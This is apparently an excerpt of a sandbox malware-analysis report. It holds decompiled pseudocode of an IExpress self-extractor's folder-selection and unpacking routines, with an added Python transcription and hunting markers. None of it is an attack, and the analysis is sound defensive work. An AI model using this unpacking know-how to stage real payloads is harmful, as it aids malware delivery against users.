283 7ff64c5168f9-7ff64c51690f GetDriveTypeA -> 287, 288
284 7ff64c516adb-7ff64c516b04 GetWindowsDirectoryA call 7ff64c516ca4 -> 254, 295
287 7ff64c516916-7ff64c51692a GetFileAttributesA -> 292, 293
288 7ff64c516911-7ff64c516914 -> 287, 292
290 7ff64c516897-7ff64c5168a7 call 7ff64c5164e4 -> 267, 273
292 7ff64c516930-7ff64c516933 -> 297, 298
293 7ff64c5169bd-7ff64c5169d0 call 7ff64c516ca4 -> 304, 305
295 7ff64c516b0a -> 270
297 7ff64c5169ad -> 300
298 7ff64c516935-7ff64c51693f -> 300, 302
300 7ff64c5169b1-7ff64c5169b8 -> 303
302 7ff64c516941-7ff64c516953 -> 300, 306
303 7ff64c516ad2-7ff64c516ad5 -> 283, 284
304 7ff64c5169d2-7ff64c5169de call 7ff64c512468 -> 297, 315
305 7ff64c5169f4-7ff64c516a00 call 7ff64c512468 -> 313, 314
306 7ff64c516955-7ff64c516981 GetDiskFreeSpaceA -> 297, 307
307 7ff64c516983-7ff64c5169a4 MulDiv -> 297, 310
310 7ff64c5169a6-7ff64c5169ab -> 293, 297
313 7ff64c516a16-7ff64c516a3e call 7ff64c517ba8 GetFileAttributesA -> 320, 321
314 7ff64c516a02-7ff64c516a11 GetWindowsDirectoryA -> 313
315 7ff64c5169e0-7ff64c5169f2 call 7ff64c516ca4 -> 297, 305
320 7ff64c516a40-7ff64c516a53 CreateDirectoryA -> 322
321 7ff64c516a55 -> 322
322 7ff64c516a58-7ff64c516a5a -> 323, 324
323 7ff64c516a5c-7ff64c516a6b -> 303
324 7ff64c516a6d-7ff64c516a8e SetFileAttributesA -> 325
325 7ff64c516a91-7ff64c516a9b -> 326, 327
326 7ff64c516a9d-7ff64c516aa3 -> 327, 328
327 7ff64c516aaf-7ff64c516acc call 7ff64c5164e4 -> 273, 331
328 7ff64c516aa5-7ff64c516aad -> 325, 327
331 7ff64c516ace -> 303
                                                    C-Code - Quality: 56%
                                                    			E00007FF67FF64C5166C4(void* __edi, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r10, long long __r12) {
                                                    				void* __rbp;
                                                    				char _t71;
                                                    				intOrPtr _t81;
                                                    				void* _t85;
                                                    				char _t88;
                                                    				int _t89;
                                                    				int _t93;
                                                    				signed int _t101;
                                                    				char _t104;
                                                    				intOrPtr _t117;
                                                    				void* _t156;
                                                    				intOrPtr _t158;
                                                    				intOrPtr _t159;
                                                    				char _t165;
                                                    				char _t184;
                                                    				void* _t191;
                                                    				signed long long _t192;
                                                    				signed long long _t193;
                                                    				long long _t202;
                                                    				char* _t213;
                                                    				void* _t216;
                                                    				void* _t242;
                                                    				CHAR* _t250;
                                                    				void* _t253;
                                                    				signed long long _t254;
                                                    				void* _t256;
                                                    				void* _t268;
                                                    				int _t270;
                                                    
                                                    				_t264 = __r10;
                                                    				_t261 = __r9;
                                                    				_t256 = __r8;
                                                    				_t246 = __rsi;
                                                    				_t202 = __rbx;
                                                    				_t191 = _t253;
                                                    				 *((long long*)(_t191 + 8)) = __rbx;
                                                    				 *((long long*)(_t191 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t191 + 0x18)) = __rdi;
                                                    				 *((long long*)(_t191 + 0x20)) = __r12;
                                                    				_t251 = _t191 - 0x78;
                                                    				_t254 = _t253 - 0x160;
                                                    				_t192 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_t193 = _t192 ^ _t254;
                                                    				 *(_t191 - 0x78 + 0x50) = _t193;
                                                    				r8d = 0;
                                                    				_t71 = E00007FF67FF64C515050(_t193, __rbx, "RUNPROGRAM", __rdx, __rsi, _t191 - 0x78);
                                                    				LocalAlloc(_t270);
                                                    				if (_t193 != 0) goto 0x4c516756;
                                                    				 *((intOrPtr*)(_t254 + 0x28)) = 0;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				 *((intOrPtr*)(_t254 + 0x20)) = 0x10;
                                                    				E00007FF67FF64C514DCC("RUNPROGRAM", _t256, __r9, __r10);
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				goto 0x4c516b3a;
                                                    				r8d = _t71;
                                                    				if (E00007FF67FF64C515050(_t193, _t202, "RUNPROGRAM", _t193, _t246, _t191 - 0x78) != 0) goto 0x4c5167a5;
                                                    				 *((intOrPtr*)(_t254 + 0x28)) = 0;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				 *((intOrPtr*)(_t254 + 0x20)) = 0x10;
                                                    				E00007FF67FF64C514DCC("RUNPROGRAM", _t256, __r9, __r10);
                                                    				LocalFree(_t268);
                                                    				 *0x4c51d544 = 0x80070714;
                                                    				goto 0x4c51674f;
                                                    				lstrcmpA(_t250);
                                                    				_t117 =  *0x4c51de60; // 0x0
                                                    				r14d = 1;
                                                    				_t118 =  ==  ? r14d : _t117;
                                                    				 *0x4c51de60 =  ==  ? r14d : _t117;
                                                    				LocalFree(??);
                                                    				_t81 =  *0x4c51ce1e; // 0x0
                                                    				if (_t81 == 0) goto 0x4c516837;
                                                    				if (_t81 != 0x5c) goto 0x4c5167fb;
                                                    				_t156 =  *0x4c51ce1f - _t81; // 0x0
                                                    				r8d = 0;
                                                    				if (_t156 == 0) goto 0x4c5167fe;
                                                    				r8d = r14d;
                                                    				if (E00007FF67FF64C5164E4(0, _t202, 0x4c51ce1e, _t246, _t256) != 0) goto 0x4c516b0f;
                                                    				 *((intOrPtr*)(_t254 + 0x28)) = 0;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				 *((intOrPtr*)(_t254 + 0x20)) = 0x10;
                                                    				E00007FF67FF64C514DCC(0x4c51ce1e, _t256, _t261, __r10);
                                                    				goto 0x4c51674f;
                                                    				_t158 =  *0x4c51cd04; // 0x0
                                                    				if (_t158 != 0) goto 0x4c516b14;
                                                    				_t159 =  *0x4c51de60; // 0x0
                                                    				if (_t159 != 0) goto 0x4c516b14;
                                                    				r12d = 0x104;
                                                    				if (GetTempPathA(??, ??) == 0) goto 0x4c5168ad;
                                                    				r8d = 3;
                                                    				_t85 = E00007FF67FF64C5164E4(r14d, _t202, 0x4c51d610, _t246, _t256); // executed
                                                    				if (_t85 != 0) goto 0x4c516b0f;
                                                    				if (E00007FF67FF64C512468(_t202, 0x4c51d610) != 0) goto 0x4c5168ad;
                                                    				r8d = r14d;
                                                    				if (E00007FF67FF64C5164E4(r14d, _t202, 0x4c51d610, _t246, _t256) != 0) goto 0x4c516b0f;
                                                    				_t14 = _t254 + 0x40; // 0x144
                                                    				_t248 = "A:\\" - _t14;
                                                    				_t15 = _t254 + 0x40; // 0x144
                                                    				_t213 = _t15;
                                                    				if (__r12 + 0x7ffffefa == 0) goto 0x4c5168e1;
                                                    				_t88 =  *((intOrPtr*)("A:\\" - _t14 + _t213));
                                                    				_t165 = _t88;
                                                    				if (_t165 == 0) goto 0x4c5168e1;
                                                    				 *_t213 = _t88;
                                                    				_t214 = _t213 + _t268;
                                                    				if (_t165 != 0) goto 0x4c5168c4;
                                                    				_t18 = _t214 - 1; // 0x59
                                                    				_t197 =  !=  ? _t213 + _t268 : _t18;
                                                    				 *((char*)( !=  ? _t213 + _t268 : _t18)) = 0;
                                                    				if ( *((char*)(_t254 + 0x40)) - 0x5a > 0) goto 0x4c516adb;
                                                    				_t89 = GetDriveTypeA(??);
                                                    				if (_t89 == 6) goto 0x4c516916;
                                                    				if (_t89 != 3) goto 0x4c516930;
                                                    				_t216 = _t254 + 0x40;
                                                    				if (GetFileAttributesA(??) != 0xffffffff) goto 0x4c5169bd;
                                                    				if (_t89 != 2) goto 0x4c5169ad;
                                                    				_t23 = _t216 - 0x41; // 0x19
                                                    				if (_t23 - r14b <= 0) goto 0x4c5169b1;
                                                    				 *((intOrPtr*)(_t254 + 0x34)) = 0;
                                                    				 *((intOrPtr*)(_t254 + 0x30)) = 0;
                                                    				 *((intOrPtr*)(_t254 + 0x3c)) = 0;
                                                    				 *((intOrPtr*)(_t254 + 0x38)) = 0;
                                                    				if ( *((intOrPtr*)(_t254 + 0x40)) == 0) goto 0x4c5169b1;
                                                    				_t28 = _t254 + 0x38; // 0x13c
                                                    				_t29 = _t254 + 0x3c; // 0x140
                                                    				 *((long long*)(_t254 + 0x20)) = _t28;
                                                    				_t31 = _t254 + 0x30; // 0x134
                                                    				_t257 = _t31;
                                                    				if (GetDiskFreeSpaceA(??, ??, ??, ??, ??) == 0) goto 0x4c5169ad;
                                                    				r8d = 0x400;
                                                    				_t93 = MulDiv(??, ??, ??);
                                                    				if (_t93 == 0) goto 0x4c5169ad;
                                                    				if (_t93 - 0x19000 >= 0) goto 0x4c5169bd;
                                                    				 *((char*)(_t254 + 0x40)) =  *((intOrPtr*)(_t254 + 0x40)) + r14b;
                                                    				goto 0x4c516ad2;
                                                    				r8d = 0;
                                                    				_t40 = _t257 + 3; // 0x3
                                                    				if (E00007FF67FF64C516CA4(_t40, _t202, _t254 + 0x40, _t193, "A:\\" - _t14, _t31, _t29, __r10) != 0) goto 0x4c5169f4;
                                                    				if (E00007FF67FF64C512468(_t202, _t254 + 0x40) != 0) goto 0x4c5169ad;
                                                    				r8d = 0;
                                                    				if (E00007FF67FF64C516CA4(r14d, _t202, _t254 + 0x40, _t193, "A:\\" - _t14, _t31, _t29, __r10) == 0) goto 0x4c5169ad;
                                                    				if (E00007FF67FF64C512468(_t202, _t254 + 0x40) == 0) goto 0x4c516a16;
                                                    				GetWindowsDirectoryA(??, ??);
                                                    				E00007FF67FF64C517BA8(r12d, _t28, _t202, _t254 + 0x40, "A:\\" - _t14, _t251, "msdownld.tmp");
                                                    				if (GetFileAttributesA(??) != 0xffffffff) goto 0x4c516a55;
                                                    				_t101 = CreateDirectoryA(??, ??);
                                                    				goto 0x4c516a58;
                                                    				if ((_t101 & 0x00000010) != 0) goto 0x4c516a6d;
                                                    				 *((char*)(_t254 + 0x43)) = 0;
                                                    				 *((char*)(_t254 + 0x40)) =  *((intOrPtr*)(_t254 + 0x40)) + r14b;
                                                    				goto 0x4c516ad2;
                                                    				SetFileAttributesA(??, ??);
                                                    				if (__r12 + 0x7ffffefa == 0) goto 0x4c516aaf;
                                                    				_t104 =  *((intOrPtr*)(0x4c51d610 + _t254 + 0x40 - 0x4c51d610));
                                                    				_t184 = _t104;
                                                    				if (_t184 == 0) goto 0x4c516aaf;
                                                    				 *0x4c51d610 = _t104;
                                                    				_t242 = __r12 - _t268;
                                                    				if (_t184 != 0) goto 0x4c516a91;
                                                    				_t201 =  !=  ? 0x4c51d610 + _t268 : 0x7ff64c51d60f;
                                                    				r8d = 0;
                                                    				 *((char*)( !=  ? 0x4c51d610 + _t268 : 0x7ff64c51d60f)) = 0;
                                                    				if (E00007FF67FF64C5164E4(r14d, _t202, 0x4c51d610, _t248, _t254 + 0x40 - 0x4c51d610) != 0) goto 0x4c516b0f;
                                                    				if ( *((intOrPtr*)(_t254 + 0x40)) - 0x5a <= 0) goto 0x4c5168f9;
                                                    				GetWindowsDirectoryA(??, ??);
                                                    				_t59 = _t242 + 1; // 0x4
                                                    				r8d = _t59;
                                                    				if (E00007FF67FF64C516CA4(3, _t202, _t254 + 0x40, _t193, _t248, _t254 + 0x40 - 0x4c51d610, _t29, _t264) == 0) goto 0x4c51674f;
                                                    				goto 0x4c5168bc;
                                                    				goto 0x4c516b3a;
                                                    				 *((long long*)(_t254 + 0x28)) = _t202;
                                                    				r8d = 0;
                                                    				 *((long long*)(_t254 + 0x20)) = _t202;
                                                    				E00007FF67FF64C517AC8( !=  ? 0x4c51d610 + _t268 : 0x7ff64c51d60f, _t202, _t248, _t251, _t254 + 0x40 - 0x4c51d610, 0x7ff64c513530);
                                                    				return E00007FF67FF64C518470(0 | ( !=  ? 0x4c51d610 + _t268 : 0x7ff64c51d60f) != 0x00000000,  *((intOrPtr*)(_t254 + 0x40)),  *(_t251 + 0x50) ^ _t254);
                                                    			}
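The decompiled function above is the extraction-directory chooser of the IExpress stub: it reads the RUNPROGRAM resource, tries GetTempPathA, and when that is rejected walks drive letters from "A:\\" to "Z:\\" (the `- 0x5a > 0` test), classifies each with GetDriveTypeA, requires a usable root via GetFileAttributesA, applies a GetDiskFreeSpaceA/MulDiv free-space check against 0x19000 KB (102400 KB, i.e. 100 MiB), and falls back to GetWindowsDirectoryA, appending "msdownld.tmp" to whichever base wins. The Python below is an added example that re-expresses that loop readably so the conditions can be checked one at a time; it is not code from the sample, from Joe Sandbox, or from Microsoft. Its branch structure is read off the 56%-quality decompilation and the control-flow graph, so it is a reading to confirm in a debugger, not ground truth: in particular the operands of GetDiskFreeSpaceA and MulDiv are shown as `??` above, so the bytes-per-cluster times free-clusters pairing is an assumption, and the drive table it runs on is constructed.

```python
"""Readable transcription of the drive-scan loop in E00007FF67FF64C5166C4.

Added example, not code from the sample or from Joe Sandbox. Branch structure
is read off the 56%-quality decompilation; the GetDiskFreeSpaceA/MulDiv operands
are not recovered there (shown as ??), so free_kb() is an ASSUMPTION to confirm
in a debugger. Drive-type codes are the documented GetDriveType return values.
"""
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional

DRIVE_REMOVABLE = 2     # GetDriveType: DRIVE_REMOVABLE
DRIVE_FIXED = 3         # DRIVE_FIXED
DRIVE_RAMDISK = 6       # DRIVE_RAMDISK
MIN_FREE_KB = 0x19000   # the constant compared against the MulDiv result: 102400 KB = 100 MiB


def muldiv(a: int, b: int, c: int) -> int:
    """Win32 MulDiv: (a*b)/c rounded half away from zero; -1 on c == 0 or int32 overflow."""
    if c == 0:
        return -1
    prod = a * b
    q, r = divmod(abs(prod), abs(c))
    if 2 * r >= abs(c):
        q += 1
    result = q if (prod >= 0) == (c > 0) else -q
    if result > 0x7FFFFFFF or result < -0x80000000:
        return -1
    return result


@dataclass
class Drive:
    """One entry of a CONSTRUCTED drive table standing in for the live Win32 calls."""
    letter: str
    drive_type: int                 # what GetDriveTypeA("X:\\") would return
    root_exists: bool               # GetFileAttributesA("X:\\") != INVALID_FILE_ATTRIBUTES
    sectors_per_cluster: int = 0    # GetDiskFreeSpaceA outputs
    bytes_per_sector: int = 0
    free_clusters: int = 0


def free_kb(d: Drive) -> int:
    """ASSUMED operand pairing: bytes per cluster times free clusters, scaled to KB via MulDiv(.., .., 0x400)."""
    return muldiv(d.sectors_per_cluster * d.bytes_per_sector, d.free_clusters, 0x400)


def select_drive(drives: dict[str, Drive]) -> Optional[str]:
    """Walk A: .. Z: as the loop at 0x7ff64c5168f9 does and return the first accepted root.

    Fixed and RAM-disk drives are accepted as soon as their root exists; removable
    drives other than A: and B: are accepted only with at least MIN_FREE_KB free;
    any other letter is skipped. None means the caller falls back to the Windows
    directory (block 284, GetWindowsDirectoryA).
    """
    letter = "A"
    while letter <= "Z":                      # `buf[0] - 0x5a > 0` leaves the loop past 'Z'
        d = drives.get(letter)
        t = d.drive_type if d else 1          # DRIVE_NO_ROOT_DIR for letters without a volume
        root = f"{letter}:\\"
        if t in (DRIVE_FIXED, DRIVE_RAMDISK) and d.root_exists:
            return root                       # 0x7ff64c5169bd: candidate base directory
        if t == DRIVE_REMOVABLE and letter > "B":   # `letter - 'A' - 1 <= 0` skips A: and B:
            if free_kb(d) >= MIN_FREE_KB:     # MulDiv result 0 or -1 also fails this test
                return root
        letter = chr(ord(letter) + 1)         # `buf[0] += 1`
    return None


if __name__ == "__main__":
    table = {"C": Drive("C", DRIVE_FIXED, True), "E": Drive("E", DRIVE_REMOVABLE, True, 8, 512, 1000000)}
    print(select_drive(table))
```

The accepted root is then extended with "msdownld.tmp" (block 313), created with CreateDirectoryA if GetFileAttributesA fails, and given attributes with SetFileAttributesA; that `<drive>:\msdownld.tmp\` directory is therefore a second filesystem marker worth hunting alongside `%TEMP%\IXP000.TMP\`.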

0x7ff64c5166c4 .. 0x7ff64c516b66: instruction-address listing for E00007FF67FF64C5166C4 (148 entries as exported by the Joe Sandbox IDA plugin; only the addresses survived extraction, the instruction text and the executed/not-executed marking did not)

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                    • API String ID: 3973824516-2740620654
                                                    • Opcode ID: aa749724514e17a92a0630b937cbe188b5289099f860de4be6e22ad4012e2d81
                                                    • Instruction ID: 19e1521955215e54464789b19a5470e44f4f946893162b12979fe87007d1f2f0
                                                    • Opcode Fuzzy Hash: aa749724514e17a92a0630b937cbe188b5289099f860de4be6e22ad4012e2d81
                                                    • Instruction Fuzzy Hash: 17D19F22E1C68287EB18BF2894582BE7FA1FB85740F544136DA6E83795DF3DE925C700
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    [Control-flow graph of 7ff64c516ca4-7ff64c51701a; rendered graph with executed and not-executed blocks, node and edge list omitted. API calls on its paths: GetCurrentDirectoryA, SetCurrentDirectoryA, GetDiskFreeSpaceA, MulDiv, GetVolumeInformationA, memset, GetLastError, FormatMessageA; internal calls to 7ff64c514dcc, 7ff64c517700, 7ff64c5124f8, 7ff64c518470.]
                                                    C-Code - Quality: 25%
                                                    			E00007FF67FF64C516CA4(signed int __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r10) {
                                                    				int _t69;
                                                    				int _t72;
                                                    				int _t73;
                                                    				int _t74;
                                                    				unsigned int _t77;
                                                    				char _t80;
                                                    				void* _t82;
                                                    				long _t93;
                                                    				char _t133;
                                                    				void* _t146;
                                                    				signed long long _t147;
                                                    				char* _t164;
                                                    				int _t181;
                                                    				void* _t182;
                                                    				void* _t184;
                                                    				signed long long _t185;
                                                    				void* _t188;
                                                    				void* _t191;
                                                    				int _t196;
                                                    				int _t198;
                                                    				CHAR* _t200;
                                                    				long _t202;
                                                    
                                                    				_t146 = _t184;
                                                    				 *((long long*)(_t146 + 0x10)) = __rbx;
                                                    				 *((long long*)(_t146 + 0x18)) = __rsi;
                                                    				 *((long long*)(_t146 + 0x20)) = __rdi;
                                                    				_t4 = _t146 - 0x2a8; // -428
                                                    				_t182 = _t4;
                                                    				_t185 = _t184 - 0x380;
                                                    				_t147 =  *0x4c51c008; // 0xdeba5460e397
                                                    				 *(_t182 + 0x270) = _t147 ^ _t185;
                                                    				r12d = __edx;
                                                    				r15d = r8d;
                                                    				GetCurrentDirectoryA(_t202);
                                                    				_t69 = SetCurrentDirectoryA(_t200); // executed
                                                    				r13d = r13d ^ r13d;
                                                    				if (_t69 != 0) goto 0x4c516d3f;
                                                    				 *(_t185 + 0x28) = r13d;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				 *((intOrPtr*)(_t185 + 0x20)) = 0x10;
                                                    				E00007FF67FF64C514DCC(__rcx, __r8, __r9, __r10);
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				goto 0x4c516fe9;
                                                    				_t9 = _t185 + 0x4c; // 0x120
                                                    				 *(_t185 + 0x44) = r13d;
                                                    				_t11 = _t185 + 0x48; // 0x11c
                                                    				_t191 = _t11;
                                                    				 *((long long*)(_t185 + 0x20)) = _t9;
                                                    				_t13 = _t185 + 0x40; // 0x114
                                                    				_t188 = _t13;
                                                    				 *(_t185 + 0x40) = r13d;
                                                    				_t15 = _t185 + 0x44; // 0x118
                                                    				_t173 = _t15;
                                                    				 *(_t185 + 0x48) = r13d;
                                                    				 *(_t185 + 0x4c) = r13d;
                                                    				_t72 = GetDiskFreeSpaceA(??, ??, ??, ??, ??); // executed
                                                    				if (_t72 == 0) goto 0x4c516f63;
                                                    				r14d =  *(_t185 + 0x40);
                                                    				r8d = 0x400;
                                                    				r14d = r14d *  *(_t185 + 0x44);
                                                    				_t73 = MulDiv(_t198, _t196, _t181);
                                                    				if (_t73 == 0) goto 0x4c516f63;
                                                    				 *(_t185 + 0x38) = r13d;
                                                    				_t22 = _t185 + 0x50; // 0x124
                                                    				 *(_t185 + 0x30) = _t198;
                                                    				r9d = 0;
                                                    				 *(_t185 + 0x28) = _t22;
                                                    				r8d = 0;
                                                    				_t25 = _t185 + 0x54; // 0x128
                                                    				 *((long long*)(_t185 + 0x20)) = _t25;
                                                    				_t74 = GetVolumeInformationA(??, ??, ??, ??, ??, ??, ??, ??); // executed
                                                    				if (_t74 != 0) goto 0x4c516e45;
                                                    				r8d = 0x200;
                                                    				memset(??, ??, ??);
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				_t77 = GetLastError();
                                                    				 *(_t185 + 0x30) = _t198;
                                                    				r9d = 0;
                                                    				r8d = _t77;
                                                    				 *(_t185 + 0x28) = 0x200;
                                                    				_t30 = _t182 + 0x70; // -316
                                                    				 *((long long*)(_t185 + 0x20)) = _t30;
                                                    				FormatMessageA(??, ??, ??, ??, ??, ??, ??);
                                                    				goto 0x4c516fbd;
                                                    				SetCurrentDirectoryA(??); // executed
                                                    				_t33 = _t185 + 0x58; // 0x12c
                                                    				_t34 = _t185 + 0x58; // 0x12c
                                                    				_t164 = _t34;
                                                    				_t177 = __rcx - _t33;
                                                    				_t35 = _t173 - 5; // 0x1
                                                    				r9d = _t35;
                                                    				_t36 = _t173 - 4; // 0x2
                                                    				if (_t36 == 0) goto 0x4c516e86;
                                                    				_t80 =  *((intOrPtr*)(__rcx - _t33 + _t164));
                                                    				_t133 = _t80;
                                                    				if (_t133 == 0) goto 0x4c516e86;
                                                    				 *_t164 = _t80;
                                                    				_t165 = _t164 + _t191;
                                                    				if (_t133 != 0) goto 0x4c516e6c;
                                                    				_t38 = _t165 - 1; // 0x12b
                                                    				_t156 =  !=  ? _t164 + _t191 : _t38;
                                                    				 *((intOrPtr*)( !=  ? _t164 + _t191 : _t38)) = r13b;
                                                    				if (r14d == 0x200) goto 0x4c516eae;
                                                    				_t82 = (r13w & 0xffffffff) + r9w;
                                                    				if (_t82 - 8 < 0) goto 0x4c516e9d;
                                                    				if (_t82 != 8) goto 0x4c516ed8;
                                                    				 *(_t185 + 0x28) = r13d;
                                                    				r9d = 0;
                                                    				r8d = 0;
                                                    				 *((intOrPtr*)(_t185 + 0x20)) = 0x10;
                                                    				E00007FF67FF64C514DCC(_t164 + _t191, _t188, _t191, __r10);
                                                    				goto 0x4c516fe9;
                                                    				if (( *0x4c51de64 & 0x00000008) == 0) goto 0x4c516f0e;
                                                    				if (( *(_t185 + 0x50) & 0x00008000) == 0) goto 0x4c516f0e;
                                                    				r8d =  *0x4c51de68; // 0x0
                                                    				r8d = r8d >> 2;
                                                    				r8d = r8d +  *0x4c51de68;
                                                    				goto 0x4c516f22;
                                                    				r8d =  *0x4c51de68; // 0x0
                                                    				if ((r12d & 0x00000003) != 3) goto 0x4c516f46;
                                                    				if (_t188 + _t15 - _t191 - _t73 <= 0) goto 0x4c516f54;
                                                    				_t51 = _t185 + 0x58; // 0x12c
                                                    				E00007FF67FF64C5124F8(r15d, __rbx, _t15 - _t191, _t188, _t51);
                                                    				goto 0x4c516feb;
                                                    				if ((r9b & r12b) == 0) goto 0x4c516f4f;
                                                    				goto 0x4c516f32;
                                                    				goto 0x4c516f32;
                                                    				 *0x4c51d544 = r13d;
                                                    				goto 0x4c516feb;
                                                    				_t54 = _t182 + 0x70; // -316
                                                    				r8d = 0x200;
                                                    				memset(??, ??, ??);
                                                    				 *0x4c51d544 = E00007FF67FF64C517700();
                                                    				_t93 = GetLastError();
                                                    				 *(_t185 + 0x30) = _t198;
                                                    				r9d = 0;
                                                    				r8d = _t93;
                                                    				 *(_t185 + 0x28) = 0x200;
                                                    				_t57 = _t182 + 0x70; // -316
                                                    				 *((long long*)(_t185 + 0x20)) = _t57;
                                                    				FormatMessageA(??, ??, ??, ??, ??, ??, ??);
                                                    				 *(_t185 + 0x28) = r13d;
                                                    				_t60 = _t182 + 0x70; // -316
                                                    				 *((intOrPtr*)(_t185 + 0x20)) = 0x10;
                                                    				E00007FF67FF64C514DCC(_t54, _t177, _t60, __r10);
                                                    				SetCurrentDirectoryA(??);
                                                    				return E00007FF67FF64C518470(0, 0,  *(_t182 + 0x270) ^ _t185);
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                    • API String ID: 4237285672-305352358
                                                    • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                    • Instruction ID: 97c6586886872791cd033a46ea08e07223d3f7037e853caa9a4e5f93f9a428f7
                                                    • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                    • Instruction Fuzzy Hash: 52A17036E1C64186E728BF28E4486AEBFA1FB89744F444136DA5D83B58DF3DD865CB00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true
                                                    • Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd
                                                    Similarity
                                                    • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                    • String ID: *MEMCAB$CABINET
                                                    • API String ID: 1305606123-2642027498
                                                    • Opcode ID: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                                    • Instruction ID: 20fd9b874f3e82e2673375a6bed93892cc321c5416476b558ff212b5d7a41af9
                                                    • Opcode Fuzzy Hash: 73d02511bd41989529bcd23ff6b0e0c8ec250e42df1f9c8d155ed0afd688ad53
                                                    • Instruction Fuzzy Hash: DA510471E1CB4286EB18BF18E8882BD7FA0FB89745F858136D96E82754DF3DE064C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    [Control-flow graph of 7ff64c5130ec-7ff64c51338d; rendered graph with executed and not-executed blocks, node and edge list omitted. API calls on its paths: GetSystemDirectoryA, LoadLibraryA, GetProcAddress, DecryptFileA, FreeLibrary, GetWindowsDirectoryA, SetCurrentDirectoryA; internal calls include 7ff64c516ca4 (the function decompiled above), 7ff64c514dcc, 7ff64c517700, 7ff64c518470.]
                                                    C-Code - Quality: 61%
                                                    			E00007FF67FF64C5130EC(long long __rbx, long long _a8) {
                                                    				signed int _v24;
                                                    				char _v296;
                                                    				char _v568;
                                                    				intOrPtr _v576;
                                                    				intOrPtr _v584;
                                                    				void* __rdi;
                                                    				void* _t11;
                                                    				void* _t14;
                                                    				void* _t28;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t36;
                                                    				intOrPtr _t38;
                                                    				intOrPtr _t44;
                                                    				intOrPtr _t45;
                                                    				signed long long _t48;
                                                    				signed long long _t49;
                                                    				void* _t62;
                                                    				void* _t64;
                                                    				void* _t65;
                                                    				void* _t66;
                                                    				void* _t67;
                                                    				void* _t70;
                                                    				void* _t72;
                                                    				void* _t73;
                                                    				void* _t74;
                                                    
                                                    				_t50 = __rbx;
                                                    				_a8 = __rbx;
                                                    				_t48 =  *0x4c51c008; // 0xdeba5460e397
                                                    				_t49 = _t48 ^ _t67 - 0x00000260;
                                                    				_v24 = _t49;
